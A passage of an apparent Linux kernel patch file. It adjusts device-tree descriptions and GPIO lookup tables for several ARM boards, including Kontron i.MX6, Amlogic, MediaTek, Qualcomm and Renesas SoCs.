+-		MX6QDL_PAD_EIM_D25__GPIO3_IO25 0x1b0b0
+-	>;
+-};
+diff --git a/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi b/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
+index 85aeebc9485dd..668d33d1ff0c1 100644
+--- a/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
+@@ -244,7 +244,8 @@ &ecspi4 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_ecspi4>;
+ 	cs-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 29 GPIO_ACTIVE_LOW>;
++		   <&gpio3 29 GPIO_ACTIVE_LOW>,
++		   <&gpio3 25 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	/* default boot source: workaround #1 for errata ERR006282 */
+@@ -259,7 +260,7 @@ smarc_flash: flash@0 {
+ &fec {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_enet>;
+-	phy-mode = "rgmii";
++	phy-connection-type = "rgmii-id";
+ 	phy-handle = <&ethphy>;
+ 
+ 	mdio {
+@@ -269,7 +270,7 @@ mdio {
+ 		ethphy: ethernet-phy@1 {
+ 			compatible = "ethernet-phy-ieee802.3-c22";
+ 			reg = <1>;
+-			reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
++			reset-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 			reset-assert-us = <1000>;
+ 		};
+ 	};
+@@ -464,6 +465,8 @@ MX6QDL_PAD_EIM_D22__ECSPI4_MISO 0x100b1
+ 			MX6QDL_PAD_EIM_D24__GPIO3_IO24 0x1b0b0
+ 			/* SPI_IMX_CS0# - connected to SMARC SPI0_CS0# */
+ 			MX6QDL_PAD_EIM_D29__GPIO3_IO29 0x1b0b0
++			/* SPI4_CS3# - connected to SMARC SPI0_CS1# */
++			MX6QDL_PAD_EIM_D25__GPIO3_IO25 0x1b0b0
+ 		>;
+ 	};
+ 
+@@ -516,7 +519,7 @@ MX6QDL_PAD_RGMII_RX_CTL__RGMII_RX_CTL 0x1b0b0
+ 			MX6QDL_PAD_ENET_MDIO__ENET_MDIO       0x1b0b0
+ 			MX6QDL_PAD_ENET_MDC__ENET_MDC         0x1b0b0
+ 			MX6QDL_PAD_ENET_REF_CLK__ENET_TX_CLK  0x1b0b0
+-			MX6QDL_PAD_ENET_CRS_DV__GPIO1_IO25    0x1b0b0 /* RST_GBE0_PHY# */
++			MX6QDL_PAD_NANDF_D1__GPIO2_IO01       0x1b0b0 /* RST_GBE0_PHY# */
+ 		>;
+ 	};
+ 
+@@ -729,7 +732,7 @@ &pcie {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_pcie>;
+ 	wake-up-gpio = <&gpio6 18 GPIO_ACTIVE_HIGH>;
+-	reset-gpio = <&gpio3 13 GPIO_ACTIVE_HIGH>;
++	reset-gpio = <&gpio3 13 GPIO_ACTIVE_LOW>;
+ };
+ 
+ /* LCD_BKLT_PWM */
+@@ -817,5 +820,6 @@ &wdog1 {
+ 	/* CPLD is feeded by watchdog (hardwired) */
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_wdog1>;
++	fsl,ext-reset-output;
+ 	status = "okay";
+ };
+diff --git a/arch/arm/mach-pxa/spitz.c b/arch/arm/mach-pxa/spitz.c
+index 937f56bbaf6c6..effd28294da07 100644
+--- a/arch/arm/mach-pxa/spitz.c
++++ b/arch/arm/mach-pxa/spitz.c
+@@ -512,10 +512,8 @@ static struct ads7846_platform_data spitz_ads7846_info = {
+ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+-		GPIO_LOOKUP("gpio-pxa", SPITZ_GPIO_BACKLIGHT_CONT,
+-			    "BL_CONT", GPIO_ACTIVE_LOW),
+-		GPIO_LOOKUP("gpio-pxa", SPITZ_GPIO_BACKLIGHT_ON,
+-			    "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.1", 6, "BL_CONT", GPIO_ACTIVE_LOW),
++		GPIO_LOOKUP("sharp-scoop.1", 7, "BL_ON", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+@@ -523,10 +521,8 @@ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ static struct gpiod_lookup_table akita_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+-		GPIO_LOOKUP("gpio-pxa", AKITA_GPIO_BACKLIGHT_CONT,
+-			    "BL_CONT", GPIO_ACTIVE_LOW),
+-		GPIO_LOOKUP("gpio-pxa", AKITA_GPIO_BACKLIGHT_ON,
+-			    "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 3, "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 4, "BL_CONT", GPIO_ACTIVE_LOW),
+ 		{ },
+ 	},
+ };
+@@ -953,12 +949,9 @@ static inline void spitz_i2c_init(void) {}
+ static struct gpiod_lookup_table spitz_audio_gpio_table = {
+ 	.dev_id = "spitz-audio",
+ 	.table = {
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_L - SPITZ_SCP_GPIO_BASE,
+-			    "mute-l", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_R - SPITZ_SCP_GPIO_BASE,
+-			    "mute-r", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.1", SPITZ_GPIO_MIC_BIAS - SPITZ_SCP2_GPIO_BASE,
+-			    "mic", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 3, "mute-l", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 4, "mute-r", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.1", 8, "mic", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+@@ -966,12 +959,9 @@ static struct gpiod_lookup_table spitz_audio_gpio_table = {
+ static struct gpiod_lookup_table akita_audio_gpio_table = {
+ 	.dev_id = "spitz-audio",
+ 	.table = {
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_L - SPITZ_SCP_GPIO_BASE,
+-			    "mute-l", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_R - SPITZ_SCP_GPIO_BASE,
+-			    "mute-r", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("i2c-max7310", AKITA_GPIO_MIC_BIAS - AKITA_IOEXP_GPIO_BASE,
+-			    "mic", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 3, "mute-l", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 4, "mute-r", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 2, "mic", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
+index 7c029f552a23b..256c46771db78 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
+@@ -311,8 +311,8 @@ &hdmi_tx {
+ 		 <&reset RESET_HDMI_SYSTEM_RESET>,
+ 		 <&reset RESET_HDMI_TX>;
+ 	reset-names = "hdmitx_apb", "hdmitx", "hdmitx_phy";
+-	clocks = <&clkc CLKID_HDMI_PCLK>,
+-		 <&clkc CLKID_CLK81>,
++	clocks = <&clkc CLKID_HDMI>,
++		 <&clkc CLKID_HDMI_PCLK>,
+ 		 <&clkc CLKID_GCLK_VENCI_INT0>;
+ 	clock-names = "isfr", "iahb", "venci";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index 3500229350522..a689bd14ece99 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -323,8 +323,8 @@ &hdmi_tx {
+ 		 <&reset RESET_HDMI_SYSTEM_RESET>,
+ 		 <&reset RESET_HDMI_TX>;
+ 	reset-names = "hdmitx_apb", "hdmitx", "hdmitx_phy";
+-	clocks = <&clkc CLKID_HDMI_PCLK>,
+-		 <&clkc CLKID_CLK81>,
++	clocks = <&clkc CLKID_HDMI>,
++		 <&clkc CLKID_HDMI_PCLK>,
+ 		 <&clkc CLKID_GCLK_VENCI_INT0>;
+ 	clock-names = "isfr", "iahb", "venci";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi b/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
+index 80737731af3fe..8bc4ef9d8a61a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
+@@ -337,7 +337,7 @@ tdmin_lb: audio-controller@3c0 {
+ 		};
+ 
+ 		spdifin: audio-controller@400 {
+-			compatible = "amlogic,g12a-spdifin",
++			compatible = "amlogic,sm1-spdifin",
+ 				     "amlogic,axg-spdifin";
+ 			reg = <0x0 0x400 0x0 0x30>;
+ 			#sound-dai-cells = <0>;
+@@ -351,7 +351,7 @@ spdifin: audio-controller@400 {
+ 		};
+ 
+ 		spdifout_a: audio-controller@480 {
+-			compatible = "amlogic,g12a-spdifout",
++			compatible = "amlogic,sm1-spdifout",
+ 				     "amlogic,axg-spdifout";
+ 			reg = <0x0 0x480 0x0 0x50>;
+ 			#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index b1ddc491d2936..9c9431455f854 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -286,8 +286,8 @@ asm_sel {
+ 	/* eMMC is shared pin with parallel NAND */
+ 	emmc_pins_default: emmc-pins-default {
+ 		mux {
+-			function = "emmc", "emmc_rst";
+-			groups = "emmc";
++			function = "emmc";
++			groups = "emmc", "emmc_rst";
+ 		};
+ 
+ 		/* "NDL0","NDL1","NDL2","NDL3","NDL4","NDL5","NDL6","NDL7",
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index 527dcb279ba52..f4bb9c6521c65 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+@@ -244,8 +244,8 @@ &pio {
+ 	/* eMMC is shared pin with parallel NAND */
+ 	emmc_pins_default: emmc-pins-default {
+ 		mux {
+-			function = "emmc", "emmc_rst";
+-			groups = "emmc";
++			function = "emmc";
++			groups = "emmc", "emmc_rst";
+ 		};
+ 
+ 		/* "NDL0","NDL1","NDL2","NDL3","NDL4","NDL5","NDL6","NDL7",
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index 3d95625f1b0b4..d7fc924a9d0e3 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -168,21 +168,24 @@ anx_bridge: anx7625@58 {
+ 		vdd18-supply = <&pp1800_mipibrdg>;
+ 		vdd33-supply = <&vddio_mipibrdg>;
+ 
+-		#address-cells = <1>;
+-		#size-cells = <0>;
+-		port@0 {
+-			reg = <0>;
++		ports {
++			#address-cells = <1>;
++			#size-cells = <0>;
+ 
+-			anx7625_in: endpoint {
+-				remote-endpoint = <&dsi_out>;
++			port@0 {
++				reg = <0>;
++
++				anx7625_in: endpoint {
++					remote-endpoint = <&dsi_out>;
++				};
+ 			};
+-		};
+ 
+-		port@1 {
+-			reg = <1>;
++			port@1 {
++				reg = <1>;
+ 
+-			anx7625_out: endpoint {
+-				remote-endpoint = <&panel_in>;
++				anx7625_out: endpoint {
++					remote-endpoint = <&panel_in>;
++				};
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index 1db97d94658b9..03ccdbb1c5edd 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -767,7 +767,6 @@ pins-tx {
+ 		};
+ 		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+-			output-enable;
+ 		};
+ 		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+@@ -786,7 +785,6 @@ pins-tx {
+ 		};
+ 		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+-			output-enable;
+ 		};
+ 		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
+index 77819186086ac..de320bebe4124 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
+@@ -368,7 +368,6 @@ &usb3_dwc3 {
+ 
+ &hsusb_phy1 {
+ 	status = "okay";
+-	extcon = <&typec>;
+ 
+ 	vdda-pll-supply = <&vreg_l12a_1p8>;
+ 	vdda-phy-dpdm-supply = <&vreg_l24a_3p075>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 986a5b5c05e48..3b9a4bf897014 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2016,7 +2016,7 @@ ufshc: ufshc@624000 {
+ 				<&gcc GCC_UFS_RX_SYMBOL_0_CLK>;
+ 			freq-table-hz =
+ 				<100000000 200000000>,
+-				<0 0>,
++				<100000000 200000000>,
+ 				<0 0>,
+ 				<0 0>,
+ 				<0 0>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 7a41250539ff5..3d4941dc31d74 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -1457,7 +1457,6 @@ adreno_smmu: iommu@5040000 {
+ 			 * SoC VDDMX RPM Power Domain in the Adreno driver.
+ 			 */
+ 			power-domains = <&gpucc GPU_GX_GDSC>;
+-			status = "disabled";
+ 		};
+ 
+ 		gpucc: clock-controller@5065000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 95c515da9f2e0..71644b9b8866a 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -2537,6 +2537,8 @@ ufs_mem_phy: phy@1d87000 {
+ 			clocks = <&gcc GCC_UFS_MEM_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 9da373090593c..ba078099b8054 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -830,6 +830,8 @@ ufs_mem_phy: phy@1d87000 {
+ 			clocks = <&gcc GCC_UFS_MEM_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 
+@@ -893,6 +895,7 @@ fastrpc {
+ 					compatible = "qcom,fastrpc";
+ 					qcom,glink-channels = "fastrpcglink-apps-dsp";
+ 					label = "adsp";
++					qcom,non-secure-domain;
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+@@ -1000,6 +1003,7 @@ fastrpc {
+ 					compatible = "qcom,fastrpc";
+ 					qcom,glink-channels = "fastrpcglink-apps-dsp";
+ 					label = "cdsp";
++					qcom,non-secure-domain;
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 3d02adbc0b62f..6a2852584405e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -2125,7 +2125,7 @@ ufs_mem_hc: ufshc@1d84000 {
+ 				     "jedec,ufs-2.0";
+ 			reg = <0 0x01d84000 0 0x3000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH>;
+-			phys = <&ufs_mem_phy_lanes>;
++			phys = <&ufs_mem_phy>;
+ 			phy-names = "ufsphy";
+ 			lanes-per-direction = <2>;
+ 			#reset-cells = <1>;
+@@ -2169,10 +2169,8 @@ ufs_mem_hc: ufshc@1d84000 {
+ 
+ 		ufs_mem_phy: phy@1d87000 {
+ 			compatible = "qcom,sm8250-qmp-ufs-phy";
+-			reg = <0 0x01d87000 0 0x1c0>;
+-			#address-cells = <2>;
+-			#size-cells = <2>;
+-			ranges;
++			reg = <0 0x01d87000 0 0x1000>;
++
+ 			clock-names = "ref",
+ 				      "ref_aux";
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>,
+@@ -2180,16 +2178,12 @@ ufs_mem_phy: phy@1d87000 {
+ 
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+-			status = "disabled";
+ 
+-			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x16c>,
+-				      <0 0x01d87600 0 0x200>,
+-				      <0 0x01d87c00 0 0x200>,
+-				      <0 0x01d87800 0 0x16c>,
+-				      <0 0x01d87a00 0 0x200>;
+-				#phy-cells = <0>;
+-			};
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
++			#phy-cells = <0>;
++
++			status = "disabled";
+ 		};
+ 
+ 		ipa_virt: interconnect@1e00000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 128542582b3d8..aa0977af9411a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3153,6 +3153,8 @@ ufs_mem_phy: phy@1d87000 {
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>,
+ 				 <&gcc GCC_UFS_0_CLKREF_EN>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+index b677ef6705d94..158c99b1a7b79 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+@@ -2209,8 +2209,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		fcpvd0: fcp@fea10000 {
+@@ -2857,9 +2856,12 @@ sensor5_crit: sensor5-crit {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+index 4092c0016035e..140c4672ff5b0 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+@@ -935,8 +935,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		prr: chipid@fff00044 {
+@@ -991,10 +990,13 @@ sensor3_crit: sensor3-crit {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ 
+ 	ufs30_clk: ufs30-clk {
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index 868d1a3cbdf61..3de3ea0073c3e 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -18,12 +18,80 @@ cpus {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
++		cpu-map {
++			cluster0 {
++				core0 {
++					cpu = <&a76_0>;
++				};
++				core1 {
++					cpu = <&a76_1>;
++				};
++			};
++
++			cluster1 {
++				core0 {
++					cpu = <&a76_2>;
++				};
++				core1 {
++					cpu = <&a76_3>;
++				};
++			};
++		};
++
+ 		a76_0: cpu@0 {
+ 			compatible = "arm,cortex-a76";
+ 			reg = <0>;
+ 			device_type = "cpu";
+ 			power-domains = <&sysc R8A779G0_PD_A1E0D0C0>;
++			next-level-cache = <&L3_CA76_0>;
++			enable-method = "psci";
++		};
++
++		a76_1: cpu@100 {
++			compatible = "arm,cortex-a76";
++			reg = <0x100>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D0C1>;
++			next-level-cache = <&L3_CA76_0>;
++			enable-method = "psci";
++		};
++
++		a76_2: cpu@10000 {
++			compatible = "arm,cortex-a76";
++			reg = <0x10000>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D1C0>;
++			next-level-cache = <&L3_CA76_1>;
++			enable-method = "psci";
+ 		};
++
++		a76_3: cpu@10100 {
++			compatible = "arm,cortex-a76";
++			reg = <0x10100>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D1C1>;
++			next-level-cache = <&L3_CA76_1>;
++			enable-method = "psci";
++		};
++
++		L3_CA76_0: cache-controller-0 {
++			compatible = "cache";
++			power-domains = <&sysc R8A779G0_PD_A2E0D0>;
++			cache-unified;
++			cache-level = <3>;
++		};
++
++		L3_CA76_1: cache-controller-1 {
++			compatible = "cache";
++			power-domains = <&sysc R8A779G0_PD_A2E0D1>;
++			cache-unified;
++			cache-level = <3>;
++		};
++	};
++
++	psci {
++		compatible = "arm,psci-1.0", "arm,psci-0.2";
++		method = "smc";
+ 	};
+ 
+ 	extal_clk: extal {
+@@ -482,8 +550,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		prr: chipid@fff00044 {
+@@ -494,9 +561,12 @@ prr: chipid@fff00044 {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+index 011d4c88f4ed9..2e7db48462e1f 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -41,10 +41,13 @@ psci {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index d26488b5a82df..4703fbc9a8e0a 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -1091,9 +1091,12 @@ target: trip-point {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
